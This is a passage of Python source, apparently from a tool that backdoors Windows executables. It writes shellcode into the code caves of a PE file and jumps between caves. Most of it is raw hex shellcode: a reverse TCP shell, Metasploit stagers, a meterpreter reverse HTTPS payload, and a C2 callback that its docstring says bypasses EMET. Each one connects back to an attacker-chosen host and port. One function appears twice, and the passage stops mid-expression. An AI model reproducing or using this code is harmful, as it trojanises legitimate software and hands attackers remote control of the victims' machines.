def cave_miner(self, flItms, CavesPicked={}):
"""
Sample code for finding sutable code caves
"""
breakupvar = eat_code_caves(flItms, 0, 1)
self.shellcode1 = ""
if flItms['cave_jumping'] is True:
self.shellcode1 += "\xe9"
if breakupvar > 0:
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
breakupvar - len(self.stackpreserve) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int('0xffffffff', 16) + breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 3)
#else:
# self.shellcode1 += "\x89\x00\x00\x00"
self.shellcode1 += ("\x90" * 40
)
self.shellcode2 = ("\x90" * 48
)
self.shellcode = self.stackpreserve + self.shellcode1 + self.shellcode2 + self.stackrestore
return (self.stackpreserve + self.shellcode1, self.shellcode2 + self.stackrestore)
def cave_miner(self, flItms, CavesPicked={}):
"""
Sample code for finding sutable code caves
"""
breakupvar = eat_code_caves(flItms, 0, 1)
self.shellcode1 = ""
if flItms['cave_jumping'] is True:
self.shellcode1 += "\xe9"
if breakupvar > 0:
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
breakupvar - len(self.stackpreserve) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int('0xffffffff', 16) + breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 3)
#else:
# self.shellcode1 += "\x89\x00\x00\x00"
self.shellcode1 += ("\x90" * 40
)
self.shellcode2 = ("\x90" * 48
)
self.shellcode = self.stackpreserve + self.shellcode1 + self.shellcode2 + self.stackrestore
return (self.stackpreserve + self.shellcode1, self.shellcode2 + self.stackrestore)
def loadliba_reverse_tcp(self, flItms, CavesPicked={}):
"""
Position dependent shellcode that uses API thunks of LoadLibraryA and
GetProcAddress to find and load APIs for callback to C2.
Bypasses EMET 4.1. Idea from Jared DeMott:
http://labs.bromium.com/2014/02/24/bypassing-emet-4-1/
via @bannedit0 (twitter handle)
"""
if self.PORT is None:
print("Must provide port")
sys.exit(1)
if 'LoadLibraryA' not in flItms:
print "[!] Binary does not have the LoadLibraryA API in IAT"
return False
if 'GetProcAddress' not in flItms:
print "[!] Binary does not have GetProcAddress API in IAT"
return False
#### BEGIN ASLR BYPASS ####
# This works because we know the original entry point of the application and
# where we are supposed to be as we control where our shellcode goes
self.shellcode1 = "\xfc" # CLD
self.shellcode1 += "\xbb" # mov value below ebx
if flItms['NewCodeCave'] is True:
if 'CodeCaveVirtualAddress' in flItms:
#Current address if not in ASLR
self.shellcode1 += struct.pack(
"<I",
(flItms['CodeCaveVirtualAddress'] + len(self.shellcode1) +
len(self.stackpreserve) + flItms['buffer'] + 201))
else:
self.shellcode += '\x00x\x00\x00\x00'
else:
if flItms['CavesPicked'] == {}:
self.shellcode1 += '\x00\x00\x00\x00'
else:
for section in flItms['Sections']:
if section[0] == flItms['CavesPicked'][0][0]:
VirtualLOCofSection = section[2]
diskLOCofSection = section[4]
#Current address if not in ASLR
self.shellcode1 += struct.pack(
"<I",
int(flItms['CavesPicked'][0][1], 16) - diskLOCofSection +
VirtualLOCofSection + flItms['ImageBase'] +
len(self.shellcode1) + len(self.stackpreserve) + 9)
self.shellcode1 += "\xe8\x00\x00\x00\x00"
self.shellcode1 += "\x5e" # pop esi
self.shellcode1 += "\x2b\xf3" # sub esi,ebx
self.shellcode1 += "\x83\xfe\x00" # cmp esi,0
self.shellcode1 += "\xbb" # mov value below to EBX
self.shellcode1 += struct.pack("<I", flItms['LoadLibraryA'])
self.shellcode1 += "\xb9" # mov value below to ECX
self.shellcode1 += struct.pack("<I", flItms['GetProcAddress'])
# Don't jump if in ASLR env
self.shellcode1 += "\x74\x15" # JZ (XX) # Jump to location after ALSR check
#Find the base addr
#Base address difference now in ESI
self.shellcode1 += "\xb8" # mov eax, Normal imagebase
self.shellcode1 += struct.pack("<I", flItms['ImageBase'])
self.shellcode1 += "\x03\xc6" # add eax, esi # NOW YOU HAVE ASLR IMAGEBASE in EAX
self.shellcode1 += "\xbb" # mov ebx, the loadlibA offset
self.shellcode1 += struct.pack("<I", flItms['LoadLibraryAOffset'])
self.shellcode1 += "\xb9" # mov ecx, the getprocaddr offset
self.shellcode1 += struct.pack("<I", flItms['GetProcAddressOffset'])
self.shellcode1 += "\x03\xd8" # add ebx, eax #EBX will hold LoadlibAoffset
self.shellcode1 += "\x01\xc1" # add ecx, eax #ECX will hold Getprocaddress
####END ASLR BYPASS####
self.shellcode1 += (
"\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5F\x54\x87\xF1\xFF\x13\x68"
"\x75\x70\x00\x00\x68\x74\x61\x72\x74\x68\x57\x53\x41\x53\x54\x50"
"\x97\xFF\x16\x95\xB8\x90\x01\x00\x00\x29\xC4\x54\x50\xFF\xD5\x68"
"\x74\x41\x00\x00\x68\x6F\x63\x6B\x65\x68\x57\x53\x41\x53\x54\x57"
"\xFF\x16\x95\x31\xC0\x50\x50\x50\x50\x40\x50\x40\x50\xFF\xD5\x95"
"\x68\x65\x63\x74\x00\x68\x63\x6F\x6E\x6E\x54\x57\xFF\x16\x87\xCD"
"\x95\x6A\x05\x68")
self.shellcode1 += self.pack_ip_addresses() # HOST
self.shellcode1 += "\x68\x02\x00"
self.shellcode1 += struct.pack('!h', self.PORT) # PORT
self.shellcode1 += ("\x89\xE2\x6A" "\x10\x52\x51\x87\xF9\xFF\xD5")
#breakupvar is the distance between codecaves
breakupvar = eat_code_caves(flItms, 0, 1)
if flItms['cave_jumping'] is True:
self.shellcode1 += "\xe9" # JMP opcode
if breakupvar > 0:
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack(
"<I",
int(
str(
hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip("L")),
16))
else:
self.shellcode1 += struct.pack(
"<I",
int(
str(
hex(
len(self.shellcode1) - breakupvar -
len(self.stackpreserve) - 4).rstrip("L")),
16))
else:
self.shellcode1 += struct.pack(
"<I",
int('0xffffffff', 16) + breakupvar -
len(self.stackpreserve) - len(self.shellcode1) - 3)
self.shellcode2 = (
"\x85\xC0\x74\x00\x6A\x00\x68\x65\x6C"
"\x33\x32\x68\x6B\x65\x72\x6E\x54\xFF\x13\x68\x73\x41\x00\x00\x68"
"\x6F\x63\x65\x73\x68\x74\x65\x50\x72\x68\x43\x72\x65\x61\x54\x50"
"\xFF\x16\x95\x93\x68\x63\x6D\x64\x00\x89\xE3\x57\x57\x57\x87\xFE"
"\x92\x31\xF6\x6A\x12\x59\x56\xE2\xFD\x66\xC7\x44\x24\x3C\x01\x01"
"\x8D\x44\x24\x10\xC6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4E\x56"
"\x56\x53\x56\x87\xDA\xFF\xD5\x89\xE6\x6A\x00\x68\x65\x6C\x33\x32"
"\x68\x6B\x65\x72\x6E\x54\xFF\x13\x68\x65\x63\x74\x00\x68\x65\x4F"
"\x62\x6A\x68\x69\x6E\x67\x6C\x68\x46\x6F\x72\x53\x68\x57\x61\x69"
"\x74\x54\x50\x95\xFF\x17\x95\x89\xF2\x31\xF6\x4E\x56\x46\x89\xD4"
"\xFF\x32\x96\xFF\xD5\x81\xC4\x34\x02\x00\x00")
self.shellcode = self.stackpreserve + self.shellcode1 + self.shellcode2 + self.stackrestore
return (self.stackpreserve + self.shellcode1,
self.shellcode2 + self.stackrestore)
def reverse_tcp_stager(self, flItms, CavesPicked={}):
"""
Reverse tcp stager. Can be used with windows/shell/reverse_tcp or
windows/meterpreter/reverse_tcp payloads from metasploit.
"""
if self.PORT is None:
print("Must provide port")
sys.exit(1)
flItms['stager'] = True
breakupvar = eat_code_caves(flItms, 0, 1)
#shellcode1 is the thread
self.shellcode1 = (
"\xFC\x90\xE8\xC1\x00\x00\x00\x60\x89\xE5\x31\xD2\x90\x64\x8B"
"\x52\x30\x8B\x52\x0C\x8B\x52\x14\xEB\x02"
"\x41\x10\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0\xAC\x3C\x61"
"\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\x49\x75\xEF\x52\x90\x57\x8B"
"\x52\x10\x90\x8B\x42\x3C\x01\xD0\x90\x8B\x40\x78\xEB\x07\xEA\x48"
"\x42\x04\x85\x7C\x3A\x85\xC0\x0F\x84\x68\x00\x00\x00\x90\x01\xD0"
"\x50\x90\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x58\x49\x8B\x34\x8B"
"\x01\xD6\x31\xFF\x90\x31\xC0\xEB\x04\xFF\x69\xD5\x38\xAC\xC1\xCF"
"\x0D\x01\xC7\x38\xE0\xEB\x05\x7F\x1B\xD2\xEB\xCA\x75\xE6\x03\x7D"
"\xF8\x3B\x7D\x24\x75\xD4\x58\x90\x8B\x58\x24\x01\xD3\x90\x66\x8B"
"\x0C\x4B\x8B\x58\x1C\x01\xD3\x90\xEB\x04\xCD\x97\xF1\xB1\x8B\x04"
"\x8B\x01\xD0\x90\x89\x44\x24\x24\x5B\x5B\x61\x90\x59\x5A\x51\xEB"
"\x01\x0F\xFF\xE0\x58\x90\x5F\x5A\x8B\x12\xE9\x53\xFF\xFF\xFF\x90"
"\x5D\x90"
"\xBE\x22\x01\x00\x00" # <---Size of shellcode2 in hex
"\x90\x6A\x40\x90\x68\x00\x10\x00\x00"
"\x56\x90\x6A\x00\x68\x58\xA4\x53\xE5\xFF\xD5\x89\xC3\x89\xC7\x90"
"\x89\xF1")
if flItms['cave_jumping'] is True:
self.shellcode1 += "\xe9"
if breakupvar > 0:
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack(
"<I",
int(
str(
hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip("L")),
16))
else:
self.shellcode1 += struct.pack(
"<I",
int(
str(
hex(
len(self.shellcode1) - breakupvar -
len(self.stackpreserve) - 4).rstrip("L")),
16))
else:
self.shellcode1 += struct.pack(
"<I",
int('0xffffffff', 16) + breakupvar -
len(self.stackpreserve) - len(self.shellcode1) - 3)
else:
self.shellcode1 += "\xeb\x44" # <--length of shellcode below
self.shellcode1 += "\x90\x5e"
self.shellcode1 += (
"\x90\x90\x90"
"\xF2\xA4"
"\xE8\x20\x00\x00"
"\x00\xBB\xE0\x1D\x2A\x0A\x90\x68\xA6\x95\xBD\x9D\xFF\xD5\x3C\x06"
"\x7C\x0A\x80\xFB\xE0\x75\x05\xBB\x47\x13\x72\x6F\x6A\x00\x53\xFF"
"\xD5\x31\xC0\x50\x50\x50\x53\x50\x50\x68\x38\x68\x0D\x16\xFF\xD5"
"\x58\x58\x90\x61")
breakupvar = eat_code_caves(flItms, 0, 2)
if flItms['cave_jumping'] is True:
self.shellcode1 += "\xe9"
if breakupvar > 0:
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack(
"<I",
int(
str(
hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip("L")),
16))
else:
self.shellcode1 += struct.pack(
"<I",
int(
str(
hex(
len(self.shellcode1) - breakupvar -
len(self.stackpreserve) - 4).rstrip("L")),
16))
else:
self.shellcode1 += struct.pack(
"<I",
int(
str(
hex(0xffffffff + breakupvar -
len(self.stackpreserve) -
len(self.shellcode1) - 3).rstrip("L")), 16))
else:
self.shellcode1 += "\xE9\x27\x01\x00\x00"
#Begin shellcode 2:
breakupvar = eat_code_caves(flItms, 0, 1)
if flItms['cave_jumping'] is True:
self.shellcode2 = "\xe8"
if breakupvar > 0:
if len(self.shellcode2) < breakupvar:
self.shellcode2 += struct.pack(
"<I",
int(
str(
hex(0xffffffff - breakupvar -
len(self.shellcode2) + 241).rstrip("L")),
16))
else:
self.shellcode2 += struct.pack(
"<I",
int(
str(
hex(0xffffffff - len(self.shellcode2) -
breakupvar + 241).rstrip("L")), 16))
else:
self.shellcode2 += struct.pack(
"<I",
int(
str(
hex(
abs(breakupvar) + len(self.stackpreserve) +
len(self.shellcode2) + 234).rstrip("L")), 16))
else:
self.shellcode2 = "\xE8\xB7\xFF\xFF\xFF"
#Can inject any shellcode below.
self.shellcode2 += (
"\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B\x52"
"\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0\xAC"
"\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57\x8B"
"\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01\xD0"
"\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B\x01"
"\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4\x03"
"\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B\x0C"
"\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24\x5B"
"\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D\x68"
"\x33\x32\x00\x00\x68\x77\x73\x32\x5F\x54\x68\x4C\x77\x26\x07\xFF"
"\xD5\xB8\x90\x01\x00\x00\x29\xC4\x54\x50\x68\x29\x80\x6B\x00\xFF"
"\xD5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xEA\x0F\xDF\xE0\xFF\xD5"
"\x97\x6A\x05\x68")
self.shellcode2 += self.pack_ip_addresses() # IP
self.shellcode2 += ("\x68\x02\x00")
self.shellcode2 += struct.pack('!h', self.PORT)
self.shellcode2 += (
"\x89\xE6\x6A"
"\x10\x56\x57\x68\x99\xA5\x74\x61\xFF\xD5\x85\xC0\x74\x0C\xFF\x4E"
"\x08\x75\xEC\x68\xF0\xB5\xA2\x56\xFF\xD5\x6A\x00\x6A\x04\x56\x57"
"\x68\x02\xD9\xC8\x5F\xFF\xD5\x8B\x36\x6A\x40\x68\x00\x10\x00\x00"
"\x56\x6A\x00\x68\x58\xA4\x53\xE5\xFF\xD5\x93\x53\x6A\x00\x56\x53"
"\x57\x68\x02\xD9\xC8\x5F\xFF\xD5\x01\xC3\x29\xC6\x85\xF6\x75\xEC\xC3"
)
self.shellcode = self.stackpreserve + self.shellcode1 + self.shellcode2
return (self.stackpreserve + self.shellcode1, self.shellcode2)
def reverse_shell_tcp(self, flItms, CavesPicked={}):
"""
Modified metasploit windows/shell_reverse_tcp shellcode
to enable continued execution and cave jumping.
"""
if self.PORT is None:
print("Must provide port")
sys.exit(1)
#breakupvar is the distance between codecaves
breakupvar = eat_code_caves(flItms, 0, 1)
self.shellcode1 = "\xfc\xe8"
if flItms['cave_jumping'] is True:
if breakupvar > 0:
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack(
"<I",
int(
str(
hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip("L")),
16))
else:
self.shellcode1 += struct.pack(
"<I",
int(
str(
hex(
len(self.shellcode1) - breakupvar -
len(self.stackpreserve) - 4).rstrip("L")),
16))
else:
self.shellcode1 += struct.pack(
"<I",
int('0xffffffff', 16) + breakupvar -
len(self.stackpreserve) - len(self.shellcode1) - 3)
else:
self.shellcode1 += "\x89\x00\x00\x00"
self.shellcode1 += (
"\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
"\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
"\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
"\xe0\x58\x5f\x5a\x8b\x12\xeb\x86")
self.shellcode2 = (
"\x5d\x68\x33\x32\x00\x00\x68"
"\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01"
"\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50"
"\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x89\xc7"
"\x68")
self.shellcode2 += self.pack_ip_addresses() # IP
self.shellcode2 += ("\x68\x02\x00")
self.shellcode2 += struct.pack('!h', self.PORT) # PORT
self.shellcode2 += (
"\x89\xe6\x6a\x10\x56"
"\x57\x68\x99\xa5\x74\x61\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3"
"\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24"
"\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56"
"\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89"
#The NOP in the line below allows for continued execution.
"\xe0\x4e\x90\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0"
"\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80"
"\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53"
"\x81\xc4\xfc\x01\x00\x00")
self.shellcode = self.stackpreserve + self.shellcode1 + self.shellcode2 + self.stackrestore
return (self.stackpreserve + self.shellcode1,
self.shellcode2 + self.stackrestore)
def meterpreter_reverse_https(self, flItms, CavesPicked={}):
"""
Traditional meterpreter reverse https shellcode from metasploit
modified to support cave jumping.
"""
if self.PORT is None:
print("Must provide port")
sys.exit(1)
flItms['stager'] = True
breakupvar = eat_code_caves(flItms, 0, 1)
#shellcode1 is the thread
self.shellcode1 = (
"\xFC\x90\xE8\xC1\x00\x00\x00\x60\x89\xE5\x31\xD2\x90\x64\x8B"
"\x52\x30\x8B\x52\x0C\x8B\x52\x14\xEB\x02"
"\x41\x10\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0\xAC\x3C\x61"
"\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\x49\x75\xEF\x52\x90\x57\x8B"
"\x52\x10\x90\x8B\x42\x3C\x01\xD0\x90\x8B\x40\x78\xEB\x07\xEA\x48"
"\x42\x04\x85\x7C\x3A\x85\xC0\x0F\x84\x68\x00\x00\x00\x90\x01\xD0"
"\x50\x90\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x58\x49\x8B\x34\x8B"
"\x01\xD6\x31\xFF\x90\x31\xC0\xEB\x04\xFF\x69\xD5\x38\xAC\xC1\xCF"
"\x0D\x01\xC7\x38\xE0\xEB\x05\x7F\x1B\xD2\xEB\xCA\x75\xE6\x03\x7D"
"\xF8\x3B\x7D\x24\x75\xD4\x58\x90\x8B\x58\x24\x01\xD3\x90\x66\x8B"
"\x0C\x4B\x8B\x58\x1C\x01\xD3\x90\xEB\x04\xCD\x97\xF1\xB1\x8B\x04"
"\x8B\x01\xD0\x90\x89\x44\x24\x24\x5B\x5B\x61\x90\x59\x5A\x51\xEB"
"\x01\x0F\xFF\xE0\x58\x90\x5F\x5A\x8B\x12\xE9\x53\xFF\xFF\xFF\x90"
"\x5D\x90")
self.shellcode1 += "\xBE"
self.shellcode1 += struct.pack("<H", 361 + len(self.HOST))
self.shellcode1 += "\x00\x00" # <---Size of shellcode2 in hex
self.shellcode1 += (
"\x90\x6A\x40\x90\x68\x00\x10\x00\x00"
"\x56\x90\x6A\x00\x68\x58\xA4\x53\xE5\xFF\xD5\x89\xC3\x89\xC7\x90"
"\x89\xF1")
if flItms['cave_jumping'] is True:
self.shellcode1 += "\xe9"
if breakupvar > 0:
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack(
"<I",
int(
str(
hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip("L")),
16))
else:
self.shellcode1 += struct.pack(
"<I",
int(
str(
hex(
len(self.shellcode1) - breakupvar -
len(self.stackpreserve) - 4).rstrip("L")),
16))
else:
self.shellcode1 += struct.pack(
"<I",
int('0xffffffff', 16) + breakupvar -
len(self.stackpreserve) - len(self.shellcode1) - 3)
else:
self.shellcode1 += "\xeb\x44" # <--length of shellcode below
self.shellcode1 += "\x90\x5e"
self.shellcode1 += (
"\x90\x90\x90"
"\xF2\xA4"
"\xE8\x20\x00\x00"
"\x00\xBB\xE0\x1D\x2A\x0A\x90\x68\xA6\x95\xBD\x9D\xFF\xD5\x3C\x06"
"\x7C\x0A\x80\xFB\xE0\x75\x05\xBB\x47\x13\x72\x6F\x6A\x00\x53\xFF"
"\xD5\x31\xC0\x50\x50\x50\x53\x50\x50\x68\x38\x68\x0D\x16\xFF\xD5"
"\x58\x58\x90\x61")
breakupvar = eat_code_caves(flItms, 0, 2)
if flItms['cave_jumping'] is True:
self.shellcode1 += "\xe9"
if breakupvar > 0:
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack(
"<I",
int(
str(
hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip("L")),
16))
else:
self.shellcode1 += struct.pack(
"<I",
int(
str(
hex(
len(self.shellcode1) - breakupvar -
len(self.stackpreserve) - 4).rstrip("L")),
16))
else:
self.shellcode1 += struct.pack(
"<I",
int(
str(
hex(0xffffffff + breakupvar -
len(self.stackpreserve) -
len(self.shellcode1) - 3).rstrip("L")), 16))
else:
self.shellcode1 += "\xE9"
self.shellcode1 += struct.pack("<H", 361 + len(self.HOST))
self.shellcode1 += "\x00\x00" # <---length shellcode2 + 5
#Begin shellcode 2:
breakupvar = eat_code_caves(flItms, 0, 1)
if flItms['cave_jumping'] is True:
self.shellcode2 = "\xe8"
if breakupvar > 0:
if len(self.shellcode2) < breakupvar:
self.shellcode2 += struct.pack(
"<I",
int(
str(
hex(0xffffffff - breakupvar -
len(self.shellcode2) + 241).rstrip("L")),
16))
else:
self.shellcode2 += struct.pack(
"<I",
int(
str(
hex(0xffffffff - len(self.shellcode2) -
breakupvar + 241).rstrip("L")), 16))
else:
self.shellcode2 += struct.pack(
"<I",
int(
str(
hex(
abs(breakupvar) + len(self.stackpreserve) +
len(self.shellcode2) + 234).rstrip("L")), 16))
else:
self.shellcode2 = "\xE8\xB7\xFF\xFF\xFF"
self.shellcode2 += (
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
"\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
"\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
"\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x6e\x65\x74\x00\x68"
"\x77\x69\x6e\x69\x54\x68\x4c\x77\x26\x07\xff\xd5\x31\xff\x57"
"\x57\x57\x57\x6a\x00\x54\x68\x3a\x56\x79\xa7\xff\xd5\xeb\x5f"
"\x5b\x31\xc9\x51\x51\x6a\x03\x51\x51\x68")
self.shellcode2 += struct.pack("<h", self.PORT)
self.shellcode2 += (
"\x00\x00\x53"
"\x50\x68\x57\x89\x9f\xc6\xff\xd5\xeb\x48\x59\x31\xd2\x52\x68"
"\x00\x32\xa0\x84\x52\x52\x52\x51\x52\x50\x68\xeb\x55\x2e\x3b"
"\xff\xd5\x89\xc6\x6a\x10\x5b\x68\x80\x33\x00\x00\x89\xe0\x6a"
"\x04\x50\x6a\x1f\x56\x68\x75\x46\x9e\x86\xff\xd5\x31\xff\x57"
"\x57\x57\x57\x56\x68\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x75\x1a"
"\x4b\x74\x10\xeb\xd5\xeb\x49\xe8\xb3\xff\xff\xff\x2f\x48\x45"
"\x56\x79\x00\x00\x68\xf0\xb5\xa2\x56\xff\xd5\x6a\x40\x68\x00"
"\x10\x00\x00\x68\x00\x00\x40\x00\x57\x68\x58\xa4\x53\xe5\xff"
"\xd5\x93\x53\x53\x89\xe7\x57\x68\x00\x20\x00\x00\x53\x56\x68"
"\x12\x96\x89\xe2\xff\xd5\x85\xc0\x74\xcd\x8b\x07\x01\xc3\x85"
"\xc0\x75\xe5\x58\xc3\xe8\x51\xff\xff\xff")
self.shellcode2 += self.HOST
self.shellcode2 += "\x00"
self.shellcode = self.stackpreserve + self.shellcode1 + self.shellcode2
return (self.stackpreserve + self.shellcode1, self.shellcode2)
def user_supplied_shellcode(self, flItms, CavesPicked={}):
"""
This module allows for the user to provide a win32 raw/binary
shellcode. For use with the -U flag. Make sure to use a process safe exit function.
"""
flItms['stager'] = True
if flItms['supplied_shellcode'] is None:
print "[!] User must provide shellcode for this module (-U)"
sys.exit(0)
else:
self.supplied_shellcode = open(self.SUPPLIED_SHELLCODE,
'r+b').read()
breakupvar = eat_code_caves(flItms, 0, 1)
self.shellcode1 = (
"\xFC\x90\xE8\xC1\x00\x00\x00\x60\x89\xE5\x31\xD2\x90\x64\x8B"
"\x52\x30\x8B\x52\x0C\x8B\x52\x14\xEB\x02"
"\x41\x10\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0\xAC\x3C\x61"
"\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\x49\x75\xEF\x52\x90\x57\x8B"
"\x52\x10\x90\x8B\x42\x3C\x01\xD0\x90\x8B\x40\x78\xEB\x07\xEA\x48"
"\x42\x04\x85\x7C\x3A\x85\xC0\x0F\x84\x68\x00\x00\x00\x90\x01\xD0"
"\x50\x90\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x58\x49\x8B\x34\x8B"
"\x01\xD6\x31\xFF\x90\x31\xC0\xEB\x04\xFF\x69\xD5\x38\xAC\xC1\xCF"
"\x0D\x01\xC7\x38\xE0\xEB\x05\x7F\x1B\xD2\xEB\xCA\x75\xE6\x03\x7D"
"\xF8\x3B\x7D\x24\x75\xD4\x58\x90\x8B\x58\x24\x01\xD3\x90\x66\x8B"
"\x0C\x4B\x8B\x58\x1C\x01\xD3\x90\xEB\x04\xCD\x97\xF1\xB1\x8B\x04"
"\x8B\x01\xD0\x90\x89\x44\x24\x24\x5B\x5B\x61\x90\x59\x5A\x51\xEB"
"\x01\x0F\xFF\xE0\x58\x90\x5F\x5A\x8B\x12\xE9\x53\xFF\xFF\xFF\x90"
"\x5D\x90"
"\xBE")
self.shellcode1 += struct.pack("<H", len(self.supplied_shellcode) + 5)
self.shellcode1 += (
"\x00\x00"
"\x90\x6A\x40\x90\x68\x00\x10\x00\x00"
"\x56\x90\x6A\x00\x68\x58\xA4\x53\xE5\xFF\xD5\x89\xC3\x89\xC7\x90"
"\x89\xF1")
if flItms['cave_jumping'] is True:
self.shellcode1 += "\xe9"
if breakupvar > 0:
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack(
"<I",
int(
str(
hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip("L")),
16))
else:
self.shellcode1 += struct.pack(
"<I",
int(
str(
hex(
len(self.shellcode1) - breakupvar -
len(self.stackpreserve) - 4).rstrip("L")),
16))
else:
self.shellcode1 += struct.pack(
"<I",
int('0xffffffff', 16) + breakupvar -
len(self.stackpreserve) - len(self.shellcode1) - 3)
else:
self.shellcode1 += "\xeb\x44" # <--length of shellcode below
self.shellcode1 += "\x90\x5e"
self.shellcode1 += (
"\x90\x90\x90"
"\xF2\xA4"
"\xE8\x20\x00\x00"
"\x00\xBB\xE0\x1D\x2A\x0A\x90\x68\xA6\x95\xBD\x9D\xFF\xD5\x3C\x06"
"\x7C\x0A\x80\xFB\xE0\x75\x05\xBB\x47\x13\x72\x6F\x6A\x00\x53\xFF"
"\xD5\x31\xC0\x50\x50\x50\x53\x50\x50\x68\x38\x68\x0D\x16\xFF\xD5"
"\x58\x58\x90\x61")
breakupvar = eat_code_caves(flItms, 0, 2)
if flItms['cave_jumping'] is True:
self.shellcode1 += "\xe9"
if breakupvar > 0:
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack(
"<I",
int(
str(
hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip("L")),
16))
else:
self.shellcode1 += struct.pack(
"<I",
int(
str(
hex(
len(self.shellcode1) - breakupvar -
